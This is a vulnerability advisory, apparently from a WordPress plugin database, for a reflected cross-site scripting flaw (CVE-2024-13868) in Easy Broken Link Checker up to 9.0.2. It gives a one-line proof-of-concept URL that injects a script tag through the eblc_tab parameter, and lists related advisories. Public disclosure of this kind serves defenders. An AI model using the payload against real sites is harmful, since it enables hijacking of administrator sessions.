Easy Broken Link Checker <= 9.0.2 – Reflected XSS | CVE 2024-13868 | Plugin Vulnerabilities

Description

The plugin does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin.

Proof of Concept

Make a logged in admin open the URL below

http://example.com/wp-content/plugins/easy-broken-link-checker/checker-options-page-view.php?eblc_tab=1"><script>alert(1)</script>

Affects Plugins

easy-broken-link-checker

No known fix

References

CVE

Classification

Type

XSS

OWASP top 10

A7: Cross-Site Scripting (XSS)

CWE

CVSS

Miscellaneous

Original Researcher

Hassan Khan Yusufzai - Splint3r7

Submitter

Hassan Khan Yusufzai - Splint3r7

Submitter website

https://hassankhanyusufzai.com

Submitter twitter

Verified

Yes

WPVDB ID

0bff1645-dd53-4416-a90f-7cf4a6b33c1a

Timeline

Publicly Published

2025-02-13 (about 10 months ago)

Added

2025-02-13 (about 10 months ago)

Last Updated

2025-02-13 (about 10 months ago)

Other

Published

Title

Published

2022-09-27

Title

Advanced Ads < 1.32.0 - Admin+ Stored XSS

Published

2014-08-01

Title

allure-real-estate-theme-for-placester <= 0.1.1 - XSS in ZeroClipboard.swf

Published

2014-08-01

Title

Token Manager 1.0.2 - "tid" Cross-Site Scripting Vulnerabilities

Published

2024-10-31

Title

Ditty < 3.1.47 - Author+ Stored XSS

Published

2022-05-03

Title

StaffList < 3.1.6 - Reflected Cross-Site Scripting